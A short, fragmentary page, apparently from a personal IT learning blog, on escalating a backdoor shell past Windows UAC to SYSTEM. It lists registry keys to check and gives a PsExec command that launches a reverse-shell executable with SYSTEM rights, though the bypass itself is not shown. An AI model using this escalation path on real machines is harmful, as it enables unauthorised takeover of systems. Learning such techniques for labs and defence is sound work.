Comment on page
Bypassing Default UAC settigs manually

​
No exploitation needed because the machine already has a backdoor. The shell belongs to the local Administrators group but UAC is enabled and needs to be bypassed, before we can elevate to SYSTEM. Specifically what must done are these steps, and in order.
1.Elevate cmd shell from Medium to High integrity
2.Elevate from High integrity cmd shell to SYSTEM
How to confirm it 
>reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
​
Now notice the three highlighted keys above and their values.
1.EnableLUA tells us whether UAC is enabled. If 0 we don’t need to bypass it at all can just PsExec to SYSTEM. If it’s 1 however, then check the other 2 keys
2.ConsentPromptBehaviorAdmin can theoretically take on 6 possible values (readable explanation here), but from configuring the UAC slider in Windows settings it takes on either 0, 2 or 5.
3.PromptOnSecureDesktop is binary, either 0 or 1.
Bypassing default UAC settings manually
Ivan's IT learning blog
PsExec64.exe -i -accepteula -d -s C:\Users\alice\Desktop\reverse_3333.exe
Page 1
printer SeLoadDriverPrivilege PE
Last modified 1yr ago